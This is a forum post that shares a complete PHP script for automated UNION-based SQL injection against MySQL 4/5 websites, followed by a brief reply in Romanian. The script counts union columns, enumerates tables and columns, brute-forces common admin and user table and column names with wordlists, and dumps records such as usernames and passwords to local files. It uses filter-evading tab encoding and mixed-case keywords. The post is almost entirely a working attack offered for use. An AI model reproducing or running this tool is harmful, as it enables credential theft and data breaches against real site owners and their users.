Jump to content
denjacker

Mysql 4/5 database Auto-injection

Recommended Posts

Posted

1248887346auto-injection.jpg


<?php
//author:www.vul.kr
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);
$server=$argv[1];
$mode=$argv[2];
$database=$argv[3];
$server=str_replace("\"","",$server);
$num=0;
if(!$server||!$mode){
print_r('
--------------------------Begin Code By www.vul.kr------------------------------
Usage:
php.exe '.$argv[0].' Url Options Database Table
Options:
1 Show Union Number [MYSQL 4/5 VERSION]
2 Show Tables [MYSQL 5 VERSION]
3 Show Columns [MYSQL 5 VERSION]
4 Show Content [MYSQL 4/5 VERSION]
5 Guess Tables [MYSQL 4 VERSION]
6 Guess Columns [MYSQL 4 VERSION]
-------------------------------End-----------------------------------------
');
exit;
}
function str_todex($string){
$num=strlen($string);
for($i=0;$i<$num;$i++){
$str=substr($string,$i,$i+1);
$ascii=ord($str);
$hex.=dechex($ascii);
}
$hex="0x".$hex;
return $hex;
}
if($mode==1) {
$injstr="0x5B676F6F676C656F72675D";
$ins=$injstr;
for($j=1;$j<=50;$j++){
$expurl=$server."%09and%091=2%09UnIoN%09SeLeCt%09".$injstr."%23";
echo "..";
$reponse=@file_get_contents($expurl);
if(strstr($reponse,"[googleorg]")){
echo "\r\nFind Colnums Numbers: $j \r\n";break;}
$injstr=$ins.",".$injstr;
}
$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$data=$expurlps;
$aall="";
$dote=",";
for($k=1;$k<=$j;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=substr($data.$aall,0,strlen($data.$aall)-1);
$expurl="%23";
$rurl=$unum.$expurl;
$fp=fopen("url.txt","w");
fwrite($fp,$rurl);
//echo "\r\n$rurl";
echo "\r\n go and see url.txt";
}

elseif($mode==2){
if($argc<>6) {echo "\r\ninjection-url option database Union-NO Union-postion\r\n";exit;}
//-----------------------------get the NO of tables------------------------------------------------------------
$expurl0=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$UnIoNnum=$argv[4]+500;
$data=$expurl0;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
$replacetext="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";
$expurl1.="%09FrOm%09information_schema.tables%09";$expurl1.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%23";
$rurl=$unum.$expurl1;
$search=$argv[5]+500;
$endurl=str_replace($search,$replacetext,$rurl);
//---------------------------------------------------------------------------------------------
$reponse1=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse1,$matchs1);
if($crack1=($matchs1[1])){$Tnum=$crack1[0];echo "\r\nFind $Tnum tables\r\n";}
for($i=0;$i<$Tnum;$i++){
echo "\r\n";
//-----------------------------Get tables-----------------------------------------------------------
$expurfirst=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$data=$expurfirst;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=substr($data.$aall,0,strlen($data.$aall)-1);
$replacetxt="CoNcAt(0x5B676F6F676C656F72675D,TABLE_NAME,0x5B2F676F6F676C656F72675D)";
$expurl="%09FrOm%09information_schema.tables%09";$expurl.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%09limit%09$i,1%23";
$rurl=$unum.$expurl;
$endurl=str_replace($search,$replacetxt,$rurl);
//------------------------------------------------------------------------------------------------
$reponse=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);
if($crack=($matchs[1]))
{$fp=fopen("table.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}
//else{echo "Done!\r\n";break;}
}}

elseif($mode==3){
$table=$argv[6];
if($argc<>7) {echo "\r\ninjection-url option database Union-NO Union-postion tablename\r\n";exit;}
//--------------------------------get count colnums------------------------------------------------------------
$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$UnIoNnum=$argv[4]+500;
$data=$expurlexp;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";
$expurl2="%09FrOm%09information_schema.COLUMNS";
$expurl2.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%23";
$rurl=$unum.$expurl2;
$search=$argv[5]+500;
$endurl=str_replace($search,$replacetx,$rurl);
//---------------------------------------------------------------------------------------------
$reponse2=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);
if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum Colnums\r\n";}
for($i=0;$i<$Cnum;$i++){

//--------------------------------Get Colnums------------------------------------------------------------
$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$data=$expurlps;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=substr($data.$aall,0,strlen($data.$aall)-1);
$replay="CoNcAt(0x5B676F6F676C656F72675D,COLUMN_NAME,0x5B2F676F6F676C656F72675D)";
$expurl="%09FrOm%09information_schema.COLUMNS";
$expurl.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%09Limit%09$i,1%23";
$rurl=$unum.$expurl;
$search=$argv[5]+500;
$endurl=str_replace($search,$replay,$rurl);
//---------------------------------------------------------------------------------------------
$reponse=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);
if($crack=($matchs[1]))
{$fp=fopen("column.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}
//else{echo "Down!\r\n";break;}
}
}
//--------------------------MYSQL4.0 Guess table---------------------------------------
elseif($mode==5) {
if($argc<>5) {echo "\r\ninjection-url option Union-NO Union-postion \r\n";exit;}
$tmptalble=array(
'users','user','admin','ident','adminlog','members','member','eq_users',
'tb_users','tbl_user','login','logging','nuke_users','admins','group_members',
'phpbb_users','administrator','admin_log','pass_admin','wp_users','accounts','adminlogin',
'auth','authenticate','authentication','account','customers','config','conf','cfg','sb_host_admin',
'WebAdmin','super','administrateurs','webmaster','webmasters','webuser','userinfo','userlist','sysadmins',
'manager','memberlist','logs','login','customer','edit','editor','administration','accounts','cms_admin','cms_admins',
'cms_user','cms_users','xoops_users','vbulletin_user','vb_user','user_login','user_logins','user_admin','tb_member',
'tb_members','tb_administrator','tb_login','tb_user','sysadmin','smf_members','smallnuke_members','site_logins','site_login',
'sitelogin','siteslogins','punbb_users','poll_user','phpBB2.phpbb_users','phpBB2.forum_users','phpbb_users','phorum_user',
'nuke_users','nuke_authors','mybb_users','mysql.user','login_admin','login_admins','login_user','login_users','jos_users',
'jos_joomblog_users','ipb.ibf_members','ibf_members','forum.ibf_members','fusion_users','e107_user','e107.e107_user','dbadmins',
'cpg132_users','chat_users','article_admin','Administratoren','administrieren','4images_users');
$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$UnIoNnum=$argv[3]+500;
$data=$expurlexp;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
$replay="0x5B676F6F676C656F72675D";
$expurl="%09FrOm%09[chinapost]%23";
$rurl=$unum.$expurl;
$search=$argv[4]+500;
$endurl=str_replace($search,$replay,$rurl);
$endurl2=$endurl;
//---------------------------------------------------------------------------------------------
for($j=0;$j<count($tmptalble);$j++){
$tb=$tmptalble[$j];
$endurl=str_replace("[chinapost]",$tb,$endurl);
$reponse=@file_get_contents($endurl);
if(strstr($reponse,"[googleorg]")){echo "\r\nFind Table: ".$tmptalble[$j];}
$endurl=$endurl2;}}

//--------------------------MYSQL4.0 Guess Colnums---------------------------------------
elseif($mode==6) {
if($argc<>7)
{echo "\r\ninjection-url option Union-NO Union-Postion Choose-postion tablename \r\n";exit;}
$tmpcol=array(
'id','uid','userid','username','cst','user','pseudo','pw','pass','password','uname','login','login_user','memeber_pass','memberpwd',
'login_pass','login_name','userpassword','userpw','userpwd,','member_pwd','memberpw','user_name','name','usr','adminname','admin','adminpass','adminpassword','passwd','adminpasswd','pwd','script','user_login','user_pass','login_passwort','usrname','usrpass',
'usr_pass','userpass','user_password','administrator','usrpw','adminpwd','adminpw','userPassword','Userlogin','Administratorzy',
'Administrator','pWord','passer','Passw','membres','membername','wp_users','usrs','usrnam','usrname','usrn','usernm','useradmin',
'user_usrnm','user_usernm','user_pword','user_pwrd','user_pwd','user_passw','user_email','user_admin','pwrd','pword','psw','passw',
'pass_word','pass_hash','p_word','memlogin','mempassword','members','membername','memberid','member_name','member_id','mem_pwd','mem_password','mem_passwd','mem_pass','mem_login','mail','md5hash','logins','login_username','login_user','login_pwd','auth',
'adminuserid','adminuser','adminemail','admin_userid','admin_user','admin_pwd','admin_password','admin_passwd','admin_pass',
'admin_name','account','accounts','sb_admin_name','sb_pwd');
$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$UnIoNnum=$argv[3]+500;
$Gtable=$argv[6];
$data=$expurlexp;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
$replay="0x5B676F6F676C656F72675D";
$expurl="%09FrOm%09".$Gtable."%23";
$rurl=$unum.$expurl;
$search=$argv[4]+500;
$SeLeCtsearch=$argv[5]+500;
$endurl=str_replace($search,$replay,$rurl);
$endurl2=$endurl;
//---------------------------------------------------------------------------------------------
for($j=0;$j<count($tmpcol);$j++){
$tb=$tmpcol[$j];
$endurl=str_replace($SeLeCtsearch,$tb,$endurl);
$reponse=@file_get_contents($endurl);
if(strstr($reponse,"[googleorg]")){
echo "\r\nFind Column: ".$tmpcol[$j];}
$endurl=$endurl2;}}

elseif($mode==4){
$table=$argv[6];
$column=$argv[7];
$column2=$argv[8];
if($argc<>9)
{echo "\r\ninjection-url option database Union-NO Union-postion tablename colnum1 colnum2\r\n";exit;}
//--------------------------------Get contents count-------------------------------------------------------------
$expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$UnIoNnum=$argv[4]+500;
$data=$expurlexp;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=$data.substr($aall,0,strlen($aall)-1);
$replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)";
$expurl2="%09FrOm%09$database.$table%23";
$rurl=$unum.$expurl2;
$search=$argv[5]+500;
$endurl=str_replace($search,$replacetx,$rurl);
//---------------------------------------------------------------------------------------------
$reponse2=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2);
if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum recodes\r\n";}
for($i=0;$i<$Cnum;$i++){

//--------------------------------Get contents------------------------------------------------------------
$expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09";
$data=$expurlps;
$aall="";
$dote=",";
for($k=501;$k<=$UnIoNnum;$k++)
{
$aall=$aall.$k.$dote;
}
$unum=substr($data.$aall,0,strlen($data.$aall)-1);
$replay="CoNcAt(0x5B676F6F676C656F72675D,".$column.",0x7C,".$column2.",0x5B2F676F6F676C656F72675D)";
$expurl="%09FrOm%09$database.$table%09Limit%09$i,1%23";
$rurl=$unum.$expurl;
$search=$argv[5]+500;
$endurl=str_replace($search,$replay,$rurl);
//---------------------------------------------------------------------------------------------
$reponse=@file_get_contents($endurl);
preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs);
if($crack=($matchs[1]))
{$fp=fopen("content.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";}
//else{echo "done!\r\n";break;}
}
}
?>

http://img.vul.kr/uploads/20090729/1248888141mysql-auto.txt

  • Upvote 1
Posted (edited)

E un script php care verifica daca este vulnerabila o baza de date.

Le: Xander are dreptate, m-am exprimat gresit. De fapt testeaza daca o pagina care acceseaza o baza de date mysql 4/5 este vulnerabil la injectie sql.

Edited by nedo

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...